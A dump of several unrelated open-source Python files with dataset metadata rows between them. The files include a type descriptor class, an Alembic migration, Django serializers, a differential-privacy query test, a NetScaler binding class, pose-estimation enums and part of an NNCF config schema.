# error = e.value
# assert error.status_code == 400
# assert error.reason == "BAD REQUEST"
# assert "Operation returned an invalid status 'BAD REQUEST'" in str(error)
# with pytest.raises(ResponseNotReadError):
# error.error
# with pytest.raises(ResponseNotReadError):
# error.model
# with pytest.raises(ResponseNotReadError):
# response.json()
# with pytest.raises(ResponseNotReadError):
# response.content
# # NOW WE READ THE RESPONSE
# response.read()
# assert error.status_code == 400
# assert error.reason == "BAD REQUEST"
# assert error.error.code == "BadRequest"
# assert error.error.message == "You made a bad request"
# assert error.model.code == "BadRequest"
# assert error.error.message == "You made a bad request"
| 38.620253
| 92
| 0.647984
|
16fab29c1af07380441a4f3bb86cd75114364f72
| 4,399
|
py
|
Python
|
pip_services3_commons/reflect/TypeDescriptor.py
|
pip-services3-python/pip-services3-commons-python
|
c33cc9a04c296acf17f7e6a303dd417931559bce
|
[
"MIT"
] | null | null | null |
pip_services3_commons/reflect/TypeDescriptor.py
|
pip-services3-python/pip-services3-commons-python
|
c33cc9a04c296acf17f7e6a303dd417931559bce
|
[
"MIT"
] | null | null | null |
pip_services3_commons/reflect/TypeDescriptor.py
|
pip-services3-python/pip-services3-commons-python
|
c33cc9a04c296acf17f7e6a303dd417931559bce
|
[
"MIT"
] | 2
|
2020-03-11T21:41:13.000Z
|
2020-03-14T00:26:20.000Z
|
# -*- coding: utf-8 -*-
"""
pip_services3_commons.reflect.TypeDescriptor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Type descriptor implementation
:copyright: Conceptual Vision Consulting LLC 2018-2019, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
from typing import Optional, Any
from ..errors.ConfigException import ConfigException
class TypeDescriptor:
"""
Descriptor that points to specific object type by it's name
and optional library (or module) where this type is defined.
This class has symmetric implementation across all languages supported
by Pip.Services toolkit and used to support dynamic data processing.
"""
def __init__(self, name: str, library: Optional[str]):
"""
Creates a new instance of the type descriptor and sets its values.
:param name: a name of the object type.
:param library: a library or module where this object type is implemented.
"""
self.__name: str = name
self.__library: str = library
def get_name(self) -> str:
"""
Get the name of the object type.
:return: the name of the object type.
"""
return self.__name
def get_library(self) -> str:
"""
Gets the name of the library or module where the object type is defined.
:return: the name of the library or module.
"""
return self.__library
def __eq__(self, other: Any) -> bool:
"""
Compares this descriptor to a args.
If the args is also a TypeDescriptor it compares their name and library fields.
Otherwise this method returns false.
:param other: a args to compare.
:return: true if args is identical TypeDescriptor and false otherwise.
"""
if isinstance(other, TypeDescriptor):
if self.__name is None or other.__name is None:
return False
if self.__name != other.__name:
return False
if self.__library is None or other.__library is None or self.__library == other.__library:
return True
return False
def equals(self, other: Any) -> bool:
"""
Compares this descriptor to a args.
If the args is also a TypeDescriptor it compares their name and library fields.
Otherwise this method returns false.
:param other: a args to compare.
:return: true if args is identical TypeDescriptor and false otherwise.
"""
if isinstance(other, TypeDescriptor):
if self.__name is None or other.__name is None:
return False
if self.__name != other.__name:
return False
if self.__library is None or other.__library is None or self.__library == other.__library:
return True
return False
def __str__(self):
"""
Gets a string representation of the object. The result has format name[,library]
:return: a string representation of the object.
"""
result = self.__name
if not (self.__library is None):
result += ',' + self.__library
return result
def to_string(self):
"""
Gets a string representation of the object. The result has format name[,library]
:return: a string representation of the object.
"""
result = self.__name
if not (self.__library is None):
result += ',' + self.__library
return result
@staticmethod
def from_string(value: str) -> Optional['TypeDescriptor']:
"""
Parses a string to get descriptor fields and returns them as a Descriptor.
The string must have format name[,library]
:param value: a string to parse.
:return: a newly created Descriptor.
"""
if value is None or len(value) == 0:
return None
tokens = value.split(",")
if len(tokens) == 1:
return TypeDescriptor(tokens[0].strip(), None)
elif len(tokens) == 2:
return TypeDescriptor(tokens[0].strip(), tokens[1].strip())
else:
raise ConfigException(
None, "BAD_DESCRIPTOR", "Type descriptor " + value + " is in wrong format"
).with_details("descriptor", value)
| 32.345588
| 102
| 0.60241
|
16f131405a0b2a5566dafa2d3d59f7d7c8fe9cea
| 1,256
|
py
|
Python
|
migrations/versions/9005ab594598_add_lettertemplates.py
|
CityOfNewYork/NYCOpenRecords
|
476a236a573e6f3a2f96c6537a30ee27b2bd3a2b
|
[
"Apache-2.0"
] | 37
|
2016-01-21T18:33:56.000Z
|
2021-10-24T01:43:20.000Z
|
migrations/versions/9005ab594598_add_lettertemplates.py
|
CityOfNewYork/NYCOpenRecords
|
476a236a573e6f3a2f96c6537a30ee27b2bd3a2b
|
[
"Apache-2.0"
] | 179
|
2016-01-21T21:33:31.000Z
|
2022-02-15T21:31:35.000Z
|
migrations/versions/9005ab594598_add_lettertemplates.py
|
CityOfNewYork/NYCOpenRecords
|
476a236a573e6f3a2f96c6537a30ee27b2bd3a2b
|
[
"Apache-2.0"
] | 13
|
2017-05-19T17:27:31.000Z
|
2020-07-05T00:55:29.000Z
|
"""Add LetterTemplates
Revision ID: 9005ab594598
Revises: 949aebe9e480
Create Date: 2018-03-20 18:41:57.143317
"""
# revision identifiers, used by Alembic.
revision = "9005ab594598"
down_revision = "949aebe9e480"
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table(
"letter_templates",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column(
"type",
sa.Enum(
"acknowledgment",
"extension",
"closing",
"denial",
"re-opening",
"letters",
name="letter_type",
),
nullable=False,
),
sa.Column("agency_ein", sa.String(length=4), nullable=True),
sa.Column("title", sa.String(), nullable=False),
sa.Column("content", sa.String(), nullable=False),
sa.ForeignKeyConstraint(["agency_ein"], ["agencies.ein"]),
sa.PrimaryKeyConstraint("id"),
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table("letter_templates")
### end Alembic commands ###
| 26.166667
| 68
| 0.57086
|
b80ab44034babe45940c7556f292d6d5ad26955c
| 423
|
py
|
Python
|
users/admin.py
|
uoe-compsci-grp30/campusgame
|
d2d7ba99210f352a7b45a1db06cea0a09e3b8c31
|
[
"MIT"
] | null | null | null |
users/admin.py
|
uoe-compsci-grp30/campusgame
|
d2d7ba99210f352a7b45a1db06cea0a09e3b8c31
|
[
"MIT"
] | null | null | null |
users/admin.py
|
uoe-compsci-grp30/campusgame
|
d2d7ba99210f352a7b45a1db06cea0a09e3b8c31
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.utils.translation import gettext_lazy
from users.models import User, GameParticipation
# Register your models here.
class MUserAdmin(UserAdmin):
fieldsets = UserAdmin.fieldsets + ((gettext_lazy("Zones stuff"), {"fields": ("is_gamekeeper",)}),)
admin.site.register(User, MUserAdmin)
admin.site.register(GameParticipation)
| 28.2
| 102
| 0.789598
|
68b37a20c7f0856430903101ba71b51173953264
| 2,304
|
py
|
Python
|
tests/sdk/query/test_top.py
|
ObliviousAI/smartnoise-sdk
|
6c5b9bdd16852a08ee01299193a1fac93def99cd
|
[
"MIT"
] | null | null | null |
tests/sdk/query/test_top.py
|
ObliviousAI/smartnoise-sdk
|
6c5b9bdd16852a08ee01299193a1fac93def99cd
|
[
"MIT"
] | null | null | null |
tests/sdk/query/test_top.py
|
ObliviousAI/smartnoise-sdk
|
6c5b9bdd16852a08ee01299193a1fac93def99cd
|
[
"MIT"
] | null | null | null |
import os
import subprocess
import copy
import pytest
import pandas as pd
from pandasql import sqldf
import math
from opendp.smartnoise.metadata import CollectionMetadata
from opendp.smartnoise.sql import PrivateReader, PandasReader
from opendp.smartnoise.sql.parse import QueryParser
git_root_dir = subprocess.check_output("git rev-parse --show-toplevel".split(" ")).decode("utf-8").strip()
meta_path = os.path.join(git_root_dir, os.path.join("datasets", "PUMS.yaml"))
csv_path = os.path.join(git_root_dir, os.path.join("datasets", "PUMS.csv"))
class TestTopAndLimit:
def setup_class(cls):
meta = CollectionMetadata.from_file(meta_path)
meta["PUMS.PUMS"].censor_dims = False
df = pd.read_csv(csv_path)
reader = PandasReader(df, meta)
private_reader = PrivateReader(reader, meta, 10.0, 10E-3)
cls.reader = private_reader
def test_queries(self):
reader = self.reader
query = 'SELECT TOP 20 age, married, COUNT(*) AS n, SUM(income) AS income FROM PUMS.PUMS GROUP BY age, married ORDER BY married, age DESC'
res = reader.execute(query)
assert len(res) == 21
query = 'SELECT age, married, COUNT(*) AS n, SUM(income) AS income FROM PUMS.PUMS GROUP BY age, married ORDER BY married, age DESC LIMIT 10'
res = reader.execute(query)
assert len(res) == 11
# run the same query with exact reader. Since ORDER BY is
# on non-private dimension, order will be the same
res_e = reader.reader.execute(query)
assert len(res_e) == 11
ages = [r[0] for r in res[1:]]
ages_e = [r[0] for r in res_e[1:]]
assert all([age == age_e for (age, age_e) in zip(ages, ages_e)])
query = 'SELECT age, married, COUNT(*) AS n, SUM(income) AS income FROM PUMS.PUMS GROUP BY age, married ORDER BY income DESC LIMIT 50'
res = reader.execute(query)
assert len(res) == 51
# run the same query with exact reader. Since ORDER BY is
# on non-private dimension, order will be different
res_e = reader.reader.execute(query)
assert len(res_e) == 51
ages = [r[0] for r in res[1:]]
ages_e = [r[0] for r in res_e[1:]]
assert not all([age == age_e for (age, age_e) in zip(ages, ages_e)])
| 40.421053
| 148
| 0.656684
|
b8353f160841dcf1ab28bbaefd491cdeab4bd309
| 6,623
|
py
|
Python
|
api/logistics/serializers.py
|
abhinavtripathy/Volog
|
8b4eb02b18bfc6d8689def9b9037325ccd3d871e
|
[
"MIT"
] | null | null | null |
api/logistics/serializers.py
|
abhinavtripathy/Volog
|
8b4eb02b18bfc6d8689def9b9037325ccd3d871e
|
[
"MIT"
] | null | null | null |
api/logistics/serializers.py
|
abhinavtripathy/Volog
|
8b4eb02b18bfc6d8689def9b9037325ccd3d871e
|
[
"MIT"
] | null | null | null |
"""
File Name: Serializers
Purpose: Serializers for translating database data before sending it over the API.
Comments:
"""
from django.db.models import Sum
from rest_framework import serializers
from rest_framework.fields import empty
from api.models import BugReport, FeedbackForm
from api.models import Student, Mentor, HourInstance, Group, StudentGroup, ActivityCategory
from auth_backend.modules.user.serializers import UserSerializer
class MentorSerializer(serializers.ModelSerializer):
user = UserSerializer(many=False, read_only=True)
class Meta:
model = Mentor
fields = ['id', 'user']
class StudentSerializer(serializers.ModelSerializer):
user = UserSerializer(many=False, read_only=True)
pending_hour = serializers.SerializerMethodField()
approved_hour = serializers.SerializerMethodField()
def get_pending_hour(self, obj):
hours = HourInstance.objects.filter(student=obj)
pending = hours.filter(approval_status='PENDING').aggregate(Sum('number_of_hours'), Sum('number_of_minutes'))
pending_hours = pending['number_of_hours__sum'] if pending['number_of_hours__sum'] else 0 + pending[
'number_of_minutes__sum'] / 60 if pending['number_of_minutes__sum'] else 0
pending_minutes = pending['number_of_minutes__sum'] % 60 if pending['number_of_minutes__sum'] else 0
return pending_hours + pending_minutes / 60
def get_approved_hour(self, obj):
hours = HourInstance.objects.filter(student=obj)
approved = hours.filter(approval_status='APPROVED').aggregate(Sum('number_of_hours'), Sum('number_of_minutes'))
approved_hours = approved['number_of_hours__sum'] if approved['number_of_hours__sum'] else 0 + approved[
'number_of_minutes__sum'] / 60 if approved['number_of_minutes__sum'] else 0
aprooved_minutes = approved['number_of_minutes__sum'] % 60 if approved['number_of_minutes__sum'] else 0
return approved_hours + aprooved_minutes / 60
class Meta:
model = Student
fields = ['id', 'user', 'student_id', 'class_standing', 'pending_hour', 'approved_hour']
class ActivityCategorySerializer(serializers.ModelSerializer):
class Meta:
model = ActivityCategory
fields = ['title']
class HourSerializer(serializers.ModelSerializer):
def __init__(self, instance=None, data=empty, pk=None, **kwargs):
super().__init__(instance, data, **kwargs)
if kwargs['context']['request'].method == 'GET':
setattr(self.Meta, 'depth', 1)
else:
setattr(self.Meta, 'depth', 0)
class Meta:
model = HourInstance
fields = ['id', 'student', 'date_of_activity', 'number_of_hours', 'number_of_minutes', 'activity_description',
'activity_category', 'type_of_hour', 'learning_goal', 'approved', 'mentor_comment', 'approval_status']
depth = 1
class GroupSerializer(serializers.ModelSerializer):
"""Group Serializer"""
students = serializers.PrimaryKeyRelatedField(
queryset=Student.objects.all(), many=True
)
mentor_detail = MentorSerializer(source='mentor', read_only=True)
pending_hour = serializers.SerializerMethodField()
approved_hour = serializers.SerializerMethodField()
def get_pending_hour(self, obj):
hours = HourInstance.objects.filter(student__in=obj.students.all())
pending = hours.filter(approval_status='PENDING').aggregate(Sum('number_of_hours'), Sum('number_of_minutes'))
pending_hours = pending['number_of_hours__sum'] if pending['number_of_hours__sum'] else 0 + pending[
'number_of_minutes__sum'] / 60 if pending['number_of_minutes__sum'] else 0
pending_minutes = pending['number_of_minutes__sum'] % 60 if pending['number_of_minutes__sum'] else 0
return pending_hours + pending_minutes / 60
def get_approved_hour(self, obj):
hours = HourInstance.objects.filter(student__in=obj.students.all())
approved = hours.filter(approval_status='APPROVED').aggregate(Sum('number_of_hours'), Sum('number_of_minutes'))
approved_hours = approved['number_of_hours__sum'] if approved['number_of_hours__sum'] else 0 + approved[
'number_of_minutes__sum'] / 60 if approved['number_of_minutes__sum'] else 0
aprooved_minutes = approved['number_of_minutes__sum'] % 60 if approved['number_of_minutes__sum'] else 0
return approved_hours + aprooved_minutes / 60
class Meta:
model = Group
fields = ('id', 'name', 'mentor', 'students', 'created_at', 'mentor_detail', 'pending_hour', 'approved_hour')
def create(self, validated_data):
students = validated_data.pop('students', [])
group = Group.objects.create(**validated_data)
student_list = [
StudentGroup(
student=student,
group=group
) for student in students
]
StudentGroup.objects.bulk_create(student_list)
return group
def update(self, instance, validated_data):
StudentGroup.objects.filter(group=instance).delete()
students = validated_data.pop('students', [])
student_list = [
StudentGroup(
student=student,
group=instance
) for student in students
]
instance.mentor = validated_data['mentor']
instance.name = validated_data['name']
StudentGroup.objects.bulk_create(student_list)
instance.save()
return instance
class StudentGroupSerializer(serializers.ModelSerializer):
student_id = serializers.PrimaryKeyRelatedField(
queryset=Student.objects.all(), source='student', write_only=True
)
group_id = serializers.PrimaryKeyRelatedField(
queryset=Group.objects.all(), source='group', write_only=True
)
student = StudentSerializer(read_only=True)
class Meta:
model = StudentGroup
fields = ('student', 'group', 'student_id', 'group_id',)
read_only_fields = ('group',)
def create(self, validated_data):
instance = super().create(validated_data)
return instance
def update(self, instance, validated_data):
user_group_instance = super(StudentGroupSerializer, self).update(
instance, validated_data
)
return user_group_instance
class FeedbackFormSerializer(serializers.ModelSerializer):
class Meta:
model = FeedbackForm
exclude = []
class BugReportSerializer(serializers.ModelSerializer):
class Meta:
model = BugReport
exclude = []
| 40.882716
| 120
| 0.691831
|
4b79104da37498b8b3a326ff8c89df6d7f52dbfa
| 6,368
|
py
|
Python
|
nssrc/com/citrix/netscaler/nitro/resource/config/cs/cspolicy_cspolicylabel_binding.py
|
mahabs/nitro
|
be74e1e177f5c205c16126bc9b023f2348788409
|
[
"Apache-2.0"
] | null | null | null |
nssrc/com/citrix/netscaler/nitro/resource/config/cs/cspolicy_cspolicylabel_binding.py
|
mahabs/nitro
|
be74e1e177f5c205c16126bc9b023f2348788409
|
[
"Apache-2.0"
] | null | null | null |
nssrc/com/citrix/netscaler/nitro/resource/config/cs/cspolicy_cspolicylabel_binding.py
|
mahabs/nitro
|
be74e1e177f5c205c16126bc9b023f2348788409
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class cspolicy_cspolicylabel_binding(base_resource) :
""" Binding class showing the cspolicylabel that can be bound to cspolicy.
"""
def __init__(self) :
self._domain = ""
self._url = ""
self._priority = 0
self._hits = 0
self._labeltype = ""
self._labelname = ""
self._policyname = ""
self.___count = 0
@property
def policyname(self) :
"""Name of the content switching policy to display. If this parameter is omitted, details of all the policies are displayed.<br/>Minimum length = 1.
"""
try :
return self._policyname
except Exception as e:
raise e
@policyname.setter
def policyname(self, policyname) :
"""Name of the content switching policy to display. If this parameter is omitted, details of all the policies are displayed.<br/>Minimum length = 1
"""
try :
self._policyname = policyname
except Exception as e:
raise e
@property
def domain(self) :
"""The domain name. The string value can range to 63 characters.<br/>Minimum length = 1.
"""
try :
return self._domain
except Exception as e:
raise e
@domain.setter
def domain(self, domain) :
"""The domain name. The string value can range to 63 characters.<br/>Minimum length = 1
"""
try :
self._domain = domain
except Exception as e:
raise e
@property
def priority(self) :
"""priority of bound policy.
"""
try :
return self._priority
except Exception as e:
raise e
@property
def labelname(self) :
"""Name of the label invoked.
"""
try :
return self._labelname
except Exception as e:
raise e
@property
def hits(self) :
"""Total number of hits.
"""
try :
return self._hits
except Exception as e:
raise e
@property
def url(self) :
"""URL string that is matched with the URL of a request. Can contain a wildcard character. Specify the string value in the following format: [[prefix] [*]] [.suffix].<br/>Minimum length = 1<br/>Maximum length = 208.
"""
try :
return self._url
except Exception as e:
raise e
@property
def labeltype(self) :
"""The invocation type.<br/>Possible values = reqvserver, resvserver, policylabel.
"""
try :
return self._labeltype
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(cspolicy_cspolicylabel_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.cspolicy_cspolicylabel_binding
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.policyname) :
return str(self.policyname)
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, policyname) :
""" Use this API to fetch cspolicy_cspolicylabel_binding resources.
"""
try :
obj = cspolicy_cspolicylabel_binding()
obj.policyname = policyname
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, policyname, filter_) :
""" Use this API to fetch filtered set of cspolicy_cspolicylabel_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = cspolicy_cspolicylabel_binding()
obj.policyname = policyname
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, policyname) :
""" Use this API to count cspolicy_cspolicylabel_binding resources configued on NetScaler.
"""
try :
obj = cspolicy_cspolicylabel_binding()
obj.policyname = policyname
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, policyname, filter_) :
""" Use this API to count the filtered set of cspolicy_cspolicylabel_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = cspolicy_cspolicylabel_binding()
obj.policyname = policyname
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class Labeltype:
reqvserver = "reqvserver"
resvserver = "resvserver"
policylabel = "policylabel"
class cspolicy_cspolicylabel_binding_response(base_response) :
def __init__(self, length=1) :
self.cspolicy_cspolicylabel_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.cspolicy_cspolicylabel_binding = [cspolicy_cspolicylabel_binding() for _ in range(length)]
| 28.684685
| 219
| 0.718593
|
a85eabb40740dd9e3ea8c93f8345887ee8867fdd
| 167
|
py
|
Python
|
lecture_5/07/typing2.py
|
darinabird/python_developer
|
7141c9e4d0deb5f2943d70eaf189316631942e56
|
[
"CC0-1.0"
] | 20
|
2020-03-04T17:26:47.000Z
|
2022-03-27T20:47:37.000Z
|
lecture_5/07/typing2.py
|
darinabird/python_developer
|
7141c9e4d0deb5f2943d70eaf189316631942e56
|
[
"CC0-1.0"
] | 3
|
2020-03-17T17:39:36.000Z
|
2020-03-31T16:01:23.000Z
|
lecture_5/07/typing2.py
|
darinabird/python_developer
|
7141c9e4d0deb5f2943d70eaf189316631942e56
|
[
"CC0-1.0"
] | 47
|
2020-03-04T17:31:26.000Z
|
2022-03-13T15:40:27.000Z
|
from typing import Union, Dict
def some_func(arg: Union[Dict[str, str], str]) -> int:
return len(arg)
some_func({"a": "b"})
some_func("abc")
some_func({"a": 1})
| 18.555556
| 54
| 0.640719
|
474ba8f0da949dd5937f968dab287593e5eb0abf
| 4,577
|
py
|
Python
|
tf_pose/common.py
|
McgBcg/MomchigiBakchigi
|
97084b44e80852503827816c64f0eb4fdf81b1a5
|
[
"Apache-2.0"
] | 1
|
2021-02-03T11:23:32.000Z
|
2021-02-03T11:23:32.000Z
|
tf_pose/common.py
|
McgBcg/MomchigiBakchigi
|
97084b44e80852503827816c64f0eb4fdf81b1a5
|
[
"Apache-2.0"
] | null | null | null |
tf_pose/common.py
|
McgBcg/MomchigiBakchigi
|
97084b44e80852503827816c64f0eb4fdf81b1a5
|
[
"Apache-2.0"
] | 1
|
2021-02-04T03:32:36.000Z
|
2021-02-04T03:32:36.000Z
|
from enum import Enum
import tensorflow as tf
import cv2
regularizer_conv = 0.004
regularizer_dsconv = 0.0004
batchnorm_fused = True
activation_fn = tf.nn.relu
class CocoPart(Enum):
Nose = 0
Neck = 1
RShoulder = 2
RElbow = 3
RWrist = 4
LShoulder = 5
LElbow = 6
LWrist = 7
RHip = 8
RKnee = 9
RAnkle = 10
LHip = 11
LKnee = 12
LAnkle = 13
REye = 14
LEye = 15
REar = 16
LEar = 17
Background = 18
class MPIIPart(Enum):
RAnkle = 0
RKnee = 1
RHip = 2
LHip = 3
LKnee = 4
LAnkle = 5
RWrist = 6
RElbow = 7
RShoulder = 8
LShoulder = 9
LElbow = 10
LWrist = 11
Neck = 12
Head = 13
@staticmethod
def from_coco(human):
# t = {
# MPIIPart.RAnkle: CocoPart.RAnkle,
# MPIIPart.RKnee: CocoPart.RKnee,
# MPIIPart.RHip: CocoPart.RHip,
# MPIIPart.LHip: CocoPart.LHip,
# MPIIPart.LKnee: CocoPart.LKnee,
# MPIIPart.LAnkle: CocoPart.LAnkle,
# MPIIPart.RWrist: CocoPart.RWrist,
# MPIIPart.RElbow: CocoPart.RElbow,
# MPIIPart.RShoulder: CocoPart.RShoulder,
# MPIIPart.LShoulder: CocoPart.LShoulder,
# MPIIPart.LElbow: CocoPart.LElbow,
# MPIIPart.LWrist: CocoPart.LWrist,
# MPIIPart.Neck: CocoPart.Neck,
# MPIIPart.Nose: CocoPart.Nose,
# }
t = [
(MPIIPart.Head, CocoPart.Nose),
(MPIIPart.Neck, CocoPart.Neck),
(MPIIPart.RShoulder, CocoPart.RShoulder),
(MPIIPart.RElbow, CocoPart.RElbow),
(MPIIPart.RWrist, CocoPart.RWrist),
(MPIIPart.LShoulder, CocoPart.LShoulder),
(MPIIPart.LElbow, CocoPart.LElbow),
(MPIIPart.LWrist, CocoPart.LWrist),
(MPIIPart.RHip, CocoPart.RHip),
(MPIIPart.RKnee, CocoPart.RKnee),
(MPIIPart.RAnkle, CocoPart.RAnkle),
(MPIIPart.LHip, CocoPart.LHip),
(MPIIPart.LKnee, CocoPart.LKnee),
(MPIIPart.LAnkle, CocoPart.LAnkle),
]
pose_2d_mpii = []
visibilty = []
for mpi, coco in t:
if coco.value not in human.body_parts.keys():
pose_2d_mpii.append((0, 0))
visibilty.append(False)
continue
pose_2d_mpii.append((human.body_parts[coco.value].x, human.body_parts[coco.value].y))
visibilty.append(True)
return pose_2d_mpii, visibilty
CocoPairs = [
(1, 2), (1, 5), (2, 3), (3, 4), (5, 6), (6, 7), (1, 8), (8, 9), (9, 10), (1, 11),
(11, 12), (12, 13), (1, 0), (0, 14), (14, 16), (0, 15), (15, 17), (2, 16), (5, 17)
] # = 19
CocoPairsRender = CocoPairs[:-2]
# CocoPairsNetwork = [
# (12, 13), (20, 21), (14, 15), (16, 17), (22, 23), (24, 25), (0, 1), (2, 3), (4, 5),
# (6, 7), (8, 9), (10, 11), (28, 29), (30, 31), (34, 35), (32, 33), (36, 37), (18, 19), (26, 27)
# ] # = 19
class TestColor:
CocoColors = [[255, 0, 0],
[0, 0, 0],
[0, 0, 0],
[255, 102, 0],
[255, 255, 0],
[0, 0, 0],
[255, 102, 0],
[255, 255, 0],
[0, 153, 0],
[0, 0, 0],
[0, 0, 255],
[0, 153, 0],
[0, 0, 0],
[0, 0, 255],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]]
def read_imgfile(path, width=None, height=None):
val_image = cv2.imread(path, cv2.IMREAD_COLOR)
if width is not None and height is not None:
val_image = cv2.resize(val_image, (width, height))
return val_image
def get_sample_images(w, h):
val_image = [
read_imgfile('./images/p1.jpg', w, h),
read_imgfile('./images/p2.jpg', w, h),
read_imgfile('./images/p3.jpg', w, h),
read_imgfile('./images/golf.jpg', w, h),
read_imgfile('./images/hand1.jpg', w, h),
read_imgfile('./images/hand2.jpg', w, h),
read_imgfile('./images/apink1_crop.jpg', w, h),
read_imgfile('./images/ski.jpg', w, h),
read_imgfile('./images/apink2.jpg', w, h),
read_imgfile('./images/apink3.jpg', w, h),
read_imgfile('./images/handsup1.jpg', w, h),
read_imgfile('./images/p3_dance.png', w, h),
]
return val_image
def to_str(s):
if not isinstance(s, str):
return s.decode('utf-8')
return s
| 29.152866
| 100
| 0.502731
|
f5eda41b005dd08d583a37f3eea3d4097f62d86e
| 239
|
py
|
Python
|
tests/test_mapper.py
|
sourcepirate/yql
|
16ebf3674cef74e0b15e026dbcb69d500e3cafd9
|
[
"MIT"
] | 1
|
2015-10-26T09:26:14.000Z
|
2015-10-26T09:26:14.000Z
|
tests/test_mapper.py
|
plasmashadow/yql
|
16ebf3674cef74e0b15e026dbcb69d500e3cafd9
|
[
"MIT"
] | 2
|
2015-09-17T03:04:42.000Z
|
2016-11-27T03:34:31.000Z
|
tests/test_mapper.py
|
sourcepirate/yql
|
16ebf3674cef74e0b15e026dbcb69d500e3cafd9
|
[
"MIT"
] | 4
|
2015-08-24T11:25:14.000Z
|
2016-11-10T04:30:29.000Z
|
import unittest
from yql.api._api_mapper import ObjectMapper
class TestMapper(unittest.TestCase):
def test_mapper(self):
a = {"a":"b", "c":{"d":"3"}}
obj = ObjectMapper(a)
self.assertEqual(obj.c.d,"3")
| 14.058824
| 44
| 0.606695
|
fc61d387f37723a0e84038de5d4ce4ab7bcba8eb
| 37,550
|
py
|
Python
|
nncf/config_schema.py
|
AbraInsight/nncf_pytorch
|
5e8d72d5e2f0c30da05d95cd9c3b3d8832ac8572
|
[
"Apache-2.0"
] | null | null | null |
nncf/config_schema.py
|
AbraInsight/nncf_pytorch
|
5e8d72d5e2f0c30da05d95cd9c3b3d8832ac8572
|
[
"Apache-2.0"
] | null | null | null |
nncf/config_schema.py
|
AbraInsight/nncf_pytorch
|
5e8d72d5e2f0c30da05d95cd9c3b3d8832ac8572
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright (c) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
from typing import Dict
import jsonschema
logger = logging.getLogger('nncf')
def make_string_or_array_of_strings_schema(addtl_dict_entries: Dict = None) -> Dict:
if addtl_dict_entries is None:
addtl_dict_entries = {}
retval = {
"type": ["array", "string"],
"items": {
"type": "string"
}
}
retval.update(addtl_dict_entries)
return retval
def make_object_or_array_of_objects_schema(single_object_schema: Dict = None) -> Dict:
retval = {
"oneOf": [
{
"type": "array",
"items": single_object_schema
},
single_object_schema
]
}
return retval
def with_attributes(schema: Dict, **kwargs) -> Dict:
retval = {**schema, **kwargs}
return retval
_NUMBER = {
"type": "number"
}
_STRING = {
"type": "string"
}
_BOOLEAN = {
"type": "boolean"
}
_ARRAY_OF_NUMBERS = {
"type": "array",
"items": _NUMBER
}
_ARRAY_OF_STRINGS = {
"type": "array",
"items": _STRING
}
SINGLE_INPUT_INFO_SCHEMA = {
"type": "object",
"properties": {
"sample_size": with_attributes(_ARRAY_OF_NUMBERS,
description="Shape of the tensor expected as input to the model.",
examples=[[1, 3, 224, 224]]),
"type": with_attributes(_STRING,
description="Data type of the model input tensor."),
"filler": with_attributes(_STRING,
description="Determines what the tensor will be filled with when passed to the model"
" during tracing and exporting."),
"keyword": with_attributes(_STRING,
description="Keyword to be used when passing the tensor to the model's "
"'forward' method.")
},
"additionalProperties": False
}
QUANTIZER_CONFIG_PROPERTIES = {
"mode": with_attributes(_STRING,
description="Mode of quantization"),
"bits": with_attributes(_NUMBER,
description="Bitwidth to quantize to."),
"signed": with_attributes(_BOOLEAN,
description="Whether to use signed or unsigned input/output values for quantization."
" If specified as unsigned and the input values during initialization have "
"differing signs, will reset to performing signed quantization instead."),
"per_channel": with_attributes(_BOOLEAN,
description="Whether to quantize inputs per channel (i.e. per 0-th dimension for "
"weight quantization, and per 1-st dimension for activation "
"quantization)")
}
